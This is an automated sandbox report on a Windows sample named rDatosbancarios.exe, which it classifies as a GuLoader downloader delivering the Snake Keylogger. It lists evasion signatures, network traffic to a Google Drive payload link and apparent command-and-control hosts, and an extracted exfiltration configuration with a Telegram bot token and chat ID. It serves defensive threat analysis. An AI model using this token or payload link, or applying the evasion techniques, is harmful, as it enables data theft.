Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
rDatosbancarios.exe

Overview

General Information

Sample name:rDatosbancarios.exe
Analysis ID:1634944
MD5:ad465ed89a2c85de228c1eca00ad3c21
SHA1:693a1f701261b57a351587afaabcfd7e9e519db2
SHA256:05e5731dc9129d9f1019a21fbbb672fa0a01a1bb8e89393e630b75ec38797928
Tags:exeuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger
Score:96
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Yara detected Snake Keylogger
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection

Classification

Process Tree

  • System is w10x64
  • rDatosbancarios.exe (PID: 8704 cmdline: "C:\Users\user\Desktop\rDatosbancarios.exe" MD5: AD465ED89A2C85DE228C1ECA00AD3C21)
    • rDatosbancarios.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\rDatosbancarios.exe" MD5: AD465ED89A2C85DE228C1ECA00AD3C21)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7869489618:AAHN5xZzcFLHOzYCX49Sa8fwJ0Zb2PusB48", "Chat_id": "7618581100", "Version": "4.4"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.2166291651.0000000004666000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Signatures

      No Sigma rule has matched

      Suricata Signatures

      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-11T08:03:09.275038+010028033053Unknown Traffic192.168.2.549717104.21.96.1443TCP
      2025-03-11T08:03:20.166172+010028033053Unknown Traffic192.168.2.549723104.21.96.1443TCP
      2025-03-11T08:03:30.111896+010028033053Unknown Traffic192.168.2.549727104.21.96.1443TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-11T08:03:02.458220+010028032742Potentially Bad Traffic192.168.2.549715158.101.44.24280TCP
      2025-03-11T08:03:05.223981+010028032742Potentially Bad Traffic192.168.2.549715158.101.44.24280TCP
      2025-03-11T08:03:09.911374+010028032742Potentially Bad Traffic192.168.2.549718158.101.44.24280TCP
      2025-03-11T08:03:12.958256+010028032742Potentially Bad Traffic192.168.2.549720158.101.44.24280TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-11T08:02:55.349179+010028032702Potentially Bad Traffic192.168.2.549713172.217.16.142443TCP

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus / Scanner detection for submitted sample
      Source: rDatosbancarios.exeAvira: detected
      Found malware configuration
      Source: 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7869489618:AAHN5xZzcFLHOzYCX49Sa8fwJ0Zb2PusB48", "Chat_id": "7618581100", "Version": "4.4"}
      Multi AV Scanner detection for submitted file
      Source: rDatosbancarios.exeVirustotal: Detection: 45%Perma Link
      Source: rDatosbancarios.exeReversingLabs: Detection: 42%
      Joe Sandbox ML detected suspicious sample
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

      Location Tracking

      barindex
      Tries to detect the country of the analysis system (by using the IP)
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: rDatosbancarios.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49716 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49721 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.5:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49714 version: TLS 1.2
      Source: rDatosbancarios.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596F
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004064C1 FindFirstFileW,FindClose,0_2_004064C1
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_0040596F CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,6_2_0040596F
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_004064C1 FindFirstFileW,FindClose,6_2_004064C1
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_004027FB FindFirstFileW,6_2_004027FB
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\userJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppDataJump to behavior
      Source: C:\Users\user\Desktop\rDatosbancarios.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
      Source: Joe Sandbox ViewIP Address: 104.21.96.1 104.21.96.1
      Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
      Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: unknownDNS query: name: checkip.dyndns.org
      Source: unknownDNS query: name: reallyfreegeoip.org
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49720 -> 158.101.44.242:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49718 -> 158.101.44.242:80
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49715 -> 158.101.44.242:80
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49713 -> 172.217.16.142:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49723 -> 104.21.96.1:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49727 -> 104.21.96.1:443
      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.96.1:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49716 version: TLS 1.0
      Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49721 version: TLS 1.0
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF- HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
      Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033ECD000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E79000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F58000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
      Source: rDatosbancarios.exe, 00000006.00000002.2589949330.0000000036710000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
      Source: rDatosbancarios.exe, 00000006.00000002.2589949330.0000000036710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/j
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgxE
      Source: rDatosbancarios.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033EA7000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
      Source: rDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: rDatosbancarios.exe, 00000006.00000002.2571000085.0000000003958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: rDatosbancarios.exe, 00000006.00000002.2571000085.0000000003958000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/c
      Source: rDatosbancarios.exe, 00000006.00000002.2571000085.0000000003992000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2570982234.0000000003930000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-
      Source: rDatosbancarios.exe, 00000006.00000002.2571000085.0000000003992000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-p
      Source: rDatosbancarios.exe, 00000006.00000003.2311728339.00000000039BA000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2571000085.00000000039AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: rDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2571000085.0000000003992000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2571000085.00000000039AF000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1VDKRd-c17oS52zp028IfAVUC5WknOEF-&export=download
      Source: rDatosbancarios.exe, 00000006.00000003.2311728339.00000000039BA000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2571000085.00000000039AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/u
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033ECD000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033E8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
      Source: rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F7B000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033ECD000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F2F000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F3D000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F4A000.00000004.00000800.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000002.2589413735.0000000033F21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
      Source: rDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: rDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: rDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: rDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: rDatosbancarios.exe, 00000006.00000003.2254261791.00000000039C7000.00000004.00000020.00020000.00000000.sdmp, rDatosbancarios.exe, 00000006.00000003.2254405277.00000000039C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownHTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.5:49713 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.5:49714 version: TLS 1.2
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_0040541C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040541C
      Source: C:\Users\user\Desktop\rDatosbancarios.exeProcess Stats: CPU usage > 49%
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B6
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 6_2_004033B6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,6_2_004033B6
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_004068460_2_00406846
      Source: C:\Users\user\Desktop\rDatosbancarios.exeCode function: 0_2_00404C590_2_00404C59
